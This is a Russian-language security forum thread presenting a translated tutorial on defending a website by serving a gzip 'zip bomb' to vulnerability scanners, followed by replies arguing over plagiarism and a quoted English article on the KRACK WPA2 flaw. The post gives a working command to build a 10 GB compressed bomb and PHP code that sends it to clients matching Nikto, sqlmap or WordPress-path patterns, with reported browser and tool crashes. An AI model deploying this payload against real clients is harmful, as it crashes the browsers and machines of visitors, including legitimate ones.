1. Требуются разработчики и тестеры для проекта codebyOS. Требования для участия в проекте: Знание принципов работы ОС на базе Linux; Знание Bash; Крайне желательное знание CPP, Python, Lua; Навыки системного администрирования. Подробнее ...

    Скрыть объявление

Как защитить сайт ZIP-бомбой или старые методы хороши и сегодня

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем ghost, 11 окт 2017.

  1. ghost

    ghost penetration testing
    Grey Team

    Репутация:
    7
    Регистрация:
    12 май 2016
    Сообщения:
    474
    Симпатии:
    608
    Как защитить сайт ZIP-бомбой или старые методы хороши и сегодня
    Если вы когда-нибудь размещали веб-сайт или даже администрировали сервера, то очень хорошо осведомлены о "плохих людях, которые пытаются сделать плохие вещи с вашими вещами". Если у вас есть сервер Linux с SSH, то он возможно уже подвергаются атаке. Вы можете увидеть сколько соединений каждый день делают попытки:
    Код:
    grep 'authentication failures' /var/log/auth.log
    Как защитить сайт ZIP-бомбой или старые методы хороши и сегодня
    Сотни неудачных попыток даже несмотря на то, что этот сервер отключил проверку пароля и работает на нестандартном порту.

    WordPress обрекает всех

    Если быть честным, web-сканеры уязвимостей существовали до Wordpress, но поскольку он так широко развернут, большинства сканеров включают сканирование для некоторых неправильно настроенных папок администратора или устаревших плагинов. Так что если захотеть, то можно скачать один из сканеров и начать тестирование, в надежде получить доступ к сайту и его порчу.
    Как защитить сайт ZIP-бомбой или старые методы хороши и сегодня

    Пример лог-файла во время сканирования с помощью инструмента Nikto

    Вот почему всем администраторам серверов или веб-сайтов приходится иметь дело с гигабайтами логов, полным попыток сканирования. Поэтому мне было интересно...

    Есть ли способ нанести ответный удар?


    После "танцев с бубном" с реализацией IDS или Fail2ban я вспомнил о старой доброй ZIP-бомбе.
    Как защитить сайт ZIP-бомбой или старые методы хороши и сегодня
    Что такое ZIP-бомба?

    Сжатие ZIP прекрасно с повторяющимися данными, так что если у вас есть действительно огромный текстовый файл, который состоит из повторяющихся данных, как например все нули, он будет сжимать его действительно хорошо. И это ОЧЕНЬ хорошо.
    Как например 42.zip показывает нам, как можно сжать 4.5 Pb (4.500.000 Gb) файл до размера 42 Kb. Когда вы попытаетесь посмотреть на его содержание или распаковать, то скорее всего произойдет переполнение дискового пространства или ОЗУ.

    Как использовать ZIP-бомбу против сканера уязвимостей?

    К сожалению веб-браузеры не понимают ZIP, но они понимают GZIP. Так что сначала мы должны создать 10 GB файл GZIP, заполненый нулями. Мы могли бы сделать несколько сжатий, но давайте сейчас сделаем проще:
    Код:
    dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip
    Как защитить сайт ZIP-бомбой или старые методы хороши и сегодня

    Создание ZIP-бомбы и проверка ее размера

    Можем видеть, что это 10 Mb. Могли бы сделать лучше, но на сейчас достаточно. Теперь, когда мы создали эту веЩь, давайте настроим PHP скрипт, который будет доставлять его к клиенту:
    Код:
    <?php
    //prepare the client to recieve GZIP data. This will not be suspicious
    //since most web servers use GZIP by default
    header("Content-Encoding: gzip");
    header("Content-Length: ".filesize('10G.gzip'));
    //Turn off output buffering
    if (ob_get_level()) ob_end_clean();
    //send the gzipped file to the client
    readfile('10G.gzip');
    Ну вот!
    Так что мы могли бы использовать это в качестве простой обороны, например:
    Код:
    <?php
    $agent = filter_input(INPUT_SERVER, 'HTTP_USER_AGENT');
    
    //check for nikto, sql map or "bad" subfolders which only exist on wordpress
    if (strpos($agent, 'nikto') !== false || strpos($agent, 'sqlmap') !== false || startswith($url,'wp-') || startswith($url,'wordpress') || startswith($url,'wp/'))
    {
          sendBomb();
          exit();
    }
    
    function sendBomb(){
            //prepare the client to recieve GZIP data. This will not be suspicious
            //since most web servers use GZIP by default
            header("Content-Encoding: gzip");
            header("Content-Length: ".filesize('10G.gzip'));
            //Turn off output buffering
            if (ob_get_level()) ob_end_clean();
            //send the gzipped file to the client
            readfile('10G.gzip');
    }
    
    function startsWith($a, $b) {
        return strpos($a, $b) === 0;
    }
    ...

    Таким образом. Что происходит, когда вызывается сценарий?

    Клиент и результат

    IE 11 - Переполнение памяти, падение IE
    Chrome - Выскакивает ошибка о переполнение памяти
    Edge - Переполнение памяти
    Nikto - Кажется сканирование идет нормально и не выходит ошибку
    SQLmap - Переполнение памяти до падения
    Safari - Переполнение памяти, затем падает и перезагружается, и т.д...
    Chrome (Android) - Выскакивает ошибка о переполнение памяти

    (если вы проверили это с другими устройствами/браузерами/скриптами, пожалуйста, дайте ему знать, и он будет добавлять это здесь)
    Как защитить сайт ZIP-бомбой или старые методы хороши и сегодня
    Реакция на вызов скрипта в Chrome

    Если вы рискнете: попробуйте сами

    Можете поверить на слово :) у меня от от этого Firefox умер и калий перестал реагировать на что либо до перезагрузки
     
    #1 ghost, 11 окт 2017
    Последнее редактирование: 11 окт 2017
    DusikOff, Ivan175, _Eliot_ и 8 другим нравится это.
  2. MrNik

    MrNik New Member

    Репутация:
    0
    Регистрация:
    19 сен 2016
    Сообщения:
    3
    Симпатии:
    0
    42.zip очень старый архив любой ав заблокирует его,плюс плогиат на хакере стотья есть и архив от туда!
     
  3. NetWolf

    NetWolf Well-Known Member
    Премиум

    Репутация:
    1
    Регистрация:
    21 мар 2017
    Сообщения:
    227
    Симпатии:
    127
    Он его заблокирует в программе на компе, а не в браузере.
    42.zip - старый, а 42.gzip- новый.
     
    ghost нравится это.
  4. ghost

    ghost penetration testing
    Grey Team

    Репутация:
    7
    Регистрация:
    12 май 2016
    Сообщения:
    474
    Симпатии:
    608
    А при чем тут Хакер чтиво? Не нужно обвинять в копипасте этого материала. Взял и перевел отсюда.
    Да назови хоть 42.zip, хоть 10G.gzip как в статье. Да как угодно, когда генерируешь.
    И при чем тут антивирь вообще? Вникаете в статью, читай между строк когда читаете?
    ЭТО для защиты сайта/сервера от сканирования НЕ антивирем если что...
    Как защитить сайт ZIP-бомбой или старые методы хороши и сегодня
    При переходе сюда и выполнении сценария php я едва успел скрин системного монитора сделать.
    Затем память заполнилась и машина отказалась отзываться. Пришлось ребутнуть. Это для примера.
    --- Добавлено 16 окт 2017. Первое сообщение размещено 11 окт 2017 ---
    Да и вообще. Дополню по поводу:

    Возьмем например, недавнюю/свежую новость о новой уязвимости в WPA2. Примеры:
    Уязвимости в WPA2 ставят под угрозу практически все Wi-Fi сети
    Обнаружены критичные уязвимости в протоколе WPA2 — Key Reinstallation Attacks (KRACK)
    Безопасность Wi-Fi под угрозой из-за множества обнаруженных в WPA2 уязвимостей
    Так кто у кого скопипастил? Или немного включим моск и поищем на англоязычных источниках. :) Сами найдете?
    Oh Great, WPA2 Is Broken

    WPA2, the standard security for Wi-Fi networks these days, has been cracked due to a flaw in the protocol. Implications stemming from this crack range from decrypting Wi-Fi, hijacking connections, and injecting content. It’s fair to say, WPA2 is now Considered Harmful. The paper is available here (PDF).

    This is a proof-of-concept exploit, and like all headline-making network security stories, it has a name. It’s called KRACK, for Key Reinstallation Attack. The key insight to this exploit is a vulnerability in the handshaking between routers and devices to establish a secure connection.

    This is not the first time the researchers behind this exploit have found holes in WPA2. In a paper published by the KRACK researchers at the USENIX Symposium last August (PDF), they showed that the Random Number Generator used in 802.11 is flawed, ill-defined, and insecure. The researchers have also spoken at 33c3 on predicting WPA2 Group Keys.

    The practical consequences of a poor definition and implementation of an RNG can be found in consumer hardware. The researchers found that in MediaTek-based routers, the only source of randomness is the current time. Meanwhile Broadcom-based routers do not use the RNG proposed by the 802.11 spec, but instead take the MD5 of the current time in microseconds. The researchers do not mention if the current time is a secret.

    So what do we do now?
    This has happened before. In 2001, WEP, the Wi-Fi security protocol many security-ignorant people are still running, was cracked in much the same was as KRACK. This quickly led to the development of Aircrack, and in 2003, the Wi-Fi Alliance rolled out WPA and WPA2. Sure, you can still select a deprecated security protocol for your router, but the problem of WEP hacking is as solved as it’s ever going to be.

    The early 2000s were a different time when it came to wireless networks, though here in 2017 Wi-Fi permeates every cubic inch of our lives. Everything and everyone has Wi-Fi now. This is going to be a bit bigger than cracking WEP, but it remains possible to patch devices to ensure that this exploit is rendered useless. Install those security updates, people! Of course there will still be millions of unpatched devices in a year’s time, and for those routers, IoT baubles, and other wireless devices, turning on WPA2 will be akin to having no security at all.

    That said, this isn’t a world-ending Armageddon in the way the botnet of webcams was. You will only be vulnerable if an attacker is within range of your router, and you will still be secure if you’re accessing secure websites. However, turning off Wi-Fi on your phone, relying on mobile data, not ignoring HTTPS cert warnings, and plugging into an Ethernet port might not be a bad idea.
    Хотя и там сайты aka новостные агрегаторы аналогичные нашим, которые собирают новости с мелочи вроде этого.
    Поэтому и уважаю формат форума, где каждый может делиться СВОИМ мнением. А не какие то там бложики.

    P.S Уж извините за резкость @MrNik. Меня сложно вывести из себя, но ЭТО просто зацепило.
     
    #4 ghost, 16 окт 2017
    Последнее редактирование: 16 окт 2017
    DusikOff, fysh, Ivan175 и 7 другим нравится это.
  5. Kalina

    Kalina New Member

    Репутация:
    0
    Регистрация:
    2 дек 2016
    Сообщения:
    3
    Симпатии:
    1
    Хороша статья! Мне понравилась, Автор молодец.
     
  6. z3RoTooL

    z3RoTooL Well-Known Member
    Grey Team

    Репутация:
    0
    Регистрация:
    28 фев 2016
    Сообщения:
    543
    Симпатии:
    341
    просто кровь из глаз. ааааааааааааа
     
    ghost нравится это.
Загрузка...

Поделиться этой страницей